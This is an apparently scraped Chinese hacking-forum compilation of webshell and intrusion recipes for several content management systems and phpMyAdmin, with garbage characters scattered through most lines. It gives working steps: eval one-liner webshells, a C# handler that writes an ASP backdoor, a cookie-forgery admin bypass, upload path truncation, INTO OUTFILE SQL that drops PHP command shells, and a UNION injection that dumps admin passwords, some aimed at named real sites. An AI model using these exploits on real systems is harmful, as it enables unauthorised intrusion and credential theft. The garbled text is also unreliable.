<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
$ w2 n5 u! o K* O* fUpload a new file:<br>
* r7 X- D6 x, s- k<input type="file" name="NewFile" size="50"><br>7 I- D, g5 W* m) t3 N( i3 \
<input id="btnUpload" type="submit" value="Upload"> M; R2 ^2 J3 |' o+ k' R% }$ [' s
</form>
7 u$ Z4 V( L% g L/ Q-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" ^0 P* P: w7 G8 R r2 ~- Q- Z* L3 s
SDcms 后台拿webshell
) N* J" O9 U' f, U5 G5 H6 u' M
6 J" F2 w. R* s! V0 l+ m, W8 H第一种方法:/ q! c3 l+ q7 ` f" e
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
* N% @) ]# U1 _6 X& k把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx& V2 h( t9 d: f8 c. X
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。2 M. A& E- P; Q* F. I& h7 |
第二种方法:
& Q7 S8 C! I- x+ t8 Q& u' S; s进入后台-->系统管理-->系统设置-->系统设置->上传设置;/ i/ }& X1 _9 C% m& g
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
1 r3 C* |" B1 d' P第三种方法:8 k! T0 ~+ X9 \: ^ D
进入后台-->界面管理-->模板文件管理-->创建文件8 I( [/ L' B' T4 t6 s
文件名写入getshell.ashx ^2 B1 {9 U( W$ P# c$ ^+ ]4 Q; e0 S
内容写入下面内容:' y4 m( F4 C! ?2 R9 m# n c+ j
/====================复制下面的=========================/) k" B/ c) A6 R- s2 `& G
<%@ WebHandler Language="C#" Class="Handler" %>: T* D- `. y1 Y% K
using System;
3 m0 w- y% D% uusing System.Web;
6 G8 l2 M- K4 j& V) l) W& t; w# cusing System.IO;
1 }2 {6 ~' | U" d5 v1 R2 M+ Tpublic class Handler : IHttpHandler {
/ f. ~9 p8 n: W2 X) Upublic void ProcessRequest (HttpContext context) {
& u, R- u/ ]% [4 _context.Response.ContentType = "text/plain";0 h7 e( V I L. ]) m1 g8 _
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));$ A! L0 M& m5 B7 L M
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");0 F: ~; r* h/ c1 M [1 x C
file1.Flush();
: Q3 L' f! h' I0 x8 kfile1.Close();" c: v: h5 N& B4 [, O6 p
}
7 s: V2 m# a' c! {8 b# Vpublic bool IsReusable {8 c: e' e9 m* n* J6 z T
get {
. v& x6 Z' M: ~; y- q" p6 dreturn false;
% s% U# }( O3 |3 X: Q}6 A, e! d! u1 P8 k
}
2 z& L' _+ _- F# F% R}* p$ }4 k9 F* `* F
/=============================================/( H, C3 ^* k- @; m' p7 a
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx5 H- u- [ G$ m6 T) [; N! c7 X
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接4 L' {1 R: U: m) l- X: U9 p5 F
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% Q, Y- n9 @1 q5 Q7 U+ [
1 y, z, |0 F8 \; Y' ^6 CESCMS网站管理系统0day
9 j' J. _$ `6 }2 M x5 w
/ v% U* y$ \5 p, v6 L& b后台登陆验证是通过admin/check.asp实现的
& X$ a$ m1 q6 m( N" i1 Q% z
2 A9 e( O6 X( W5 [( {- z8 z6 r2 ^3 _3 X首先我们打开http://target.com/admin/es_index.html9 f n* D& p- a, Q
然后在COOKIE结尾加上9 Z, W4 ?* l6 t- c
; ESCMS$_SP2=ES_admin=st0p;2 F9 \+ z7 E6 {: W4 ~3 L) l# E
修改,然后刷新& ]0 r: u- I/ t+ _1 Z; l3 C, Y
进后台了嘎..3 n* i& m* d& p( N* A
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL: L3 [& j- j) l6 \2 ~# } d" `) `
9 b4 b D0 D) a, K: S0 B* |' |利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
' T2 p+ Y" ]+ s1 A; Z嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
) m- P$ Z9 I, v3 c# N( U6 m存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
9 c$ o& q/ _$ q& j% j. r在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
) q7 q& o+ e7 r; n% A1 G, l------------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ L+ ~0 f3 ~( v* f6 w7 B/ E* V1 K7 Y
4 d h) p' a$ ^
宁志网站管理系统后台无验证漏洞及修复
/ e; B& D; J* m* i+ D1 h1 V
1 \6 h ~( F1 b9 N! H' |网上搜了一下,好像没有发布.如有雷同纯粹巧合!) {: A, U: P7 u& F2 ^
官方网站:www.ningzhi.net
/ V7 h" o; r4 `* N7 N+ \学校网站管理系统 V.2011版本
( p8 O$ z8 T% V7 [1 shttp://down.chinaz.com/soft/29943.htm
/ n7 m! T5 V" f4 A其它版本(如:政府版等),自行下载.7 \ A: q9 E/ J3 T) |* f
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~3 D8 T$ \6 [. v3 g/ j% A. m
login.asp代码如下:# ~# X4 ~" \2 ?8 f2 p) U
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> 7 k- a- g9 O3 H) M
manage.asp代码我就不帖出来了.反正也没验证.
6 I7 I/ s6 x8 o1 v3 o只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!+ K1 K4 j" c# Y3 c+ ?7 g
漏洞利用:0 Y" @$ r Y, a: I
直接访问http://www.0855.tv/admin/manage.asp
4 x* {1 W: _* A/ ~3 p数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
5 e0 o3 c3 d! W) O: J3 r----------------------------------------------------------------------------------------------------------------------------------------------------------------------------; a6 z3 M/ }, I2 B7 l
0 [5 k' }, \0 v0 C3 q, u% Dphpmyadmin拿shell的四种方法总结及修复
; f5 A8 Z; r/ Y3 y$ s* Q m5 P+ j1 e& ^+ y+ e
方法一:: _" {3 ^7 c5 Z) G8 Q7 }7 m
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
: e1 i# N, @) d. ~' ` t/ A2 _' OINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
/ p3 D* l1 _: l3 I5 j- Z6 ?8 F. GSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';$ F% D4 V- P* X M
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php- C" ?1 M/ E6 w& L, c; J
一句话连接密码:7on
" X" ^6 l5 ^1 H! i( W* m0 t0 n方法二:
" K, T6 R9 O+ }) v读取文件内容: select load_file('E:/xamp/www/s.php');
2 S$ n4 s6 n! P. P# y8 y8 A: ^写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'$ i. {* L0 M5 L2 s3 h) z7 W. l
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php') b' h" ^; P; I
方法三:
3 {" P; K% w% K6 VJhackJ版本 PHPmyadmin拿shell( C; x2 @ Y7 \& a
Create TABLE study (cmd text NOT NULL);8 G5 U O' ~/ j& Z
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');; [. A5 a6 d% s4 w" C# b# h
select cmd from study into outfile 'E:/wamp/www/7.php';3 w* f3 g/ O' @; |$ s
Drop TABLE IF EXISTS study;
k+ h$ \8 l/ u( e<?php eval($_POST[cmd])?>, d! |/ Q; s5 J
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。 y- b9 l0 j$ z! k
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 17 s! l2 A- C$ U4 ~) ~& k
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1& y- a7 ^1 `: x, B+ g
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
* S9 V- W! q6 q, o/ o0 a8 b方法四:" W, c/ S- U3 S1 H2 Y
select load_file('E:/xamp/www/study.php');' h# b# X! n& S( \9 _! R
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
3 J! D6 Y# S1 b; Q# h+ ]然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
9 A2 ^+ i( R- x) ?- {9 y7 Y7 W-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 W ?: f( b% |: S- f* q- r8 P. A X2 j, u' j. R ^7 ?
NO.001中学网站管理系统 Build 110628 注入漏洞
; w+ ^. \ G9 Q |5 N
8 K0 C9 A; [% ?0 m" @, BNO.001中学网站管理系统功能模块:# X; h8 l& n/ H9 l, Q6 {
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
+ m. ^ O& e4 m( d: h4 M2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
3 e: F. b% e; g/ }5 }3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息1 e) {( J8 `. q# [2 }0 H
4.视频图片管理:一级分类,动态添加视频或者图片等信息8 M' e7 ?: w! E9 C' c5 f m) j3 O
5.留言管理:对留言,修改,删除、回复等管理/ y; e4 c6 m) [( [" j
6.校友频道:包括校友资料excel导出、管理等功能
* {2 q% O" {0 D8 J# u3 i7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
) y& x- J# a9 H X默认后台:admin/login.asp
2 P% P) v0 z) V! I" w官方演示:http://demo.001cms.net
0 W" N+ f* R- H: q! \- T- C5 K源码下载地址:http://down.chinaz.com/soft/30187.htm O) z8 e* u) g: }, ^
EXP:
& h3 f' r( n2 \! q5 }; v0 f# Junion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin2 z2 q+ Z6 Q1 b& g8 `2 L$ u
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
) H3 G: Y" n* N' p& D2 B, {1 Bgetshell:后台有备份,你懂的
# m T) L4 G2 c6 j: U! J- m另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。* h, h7 S; k3 s4 b6 n" q$ F
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |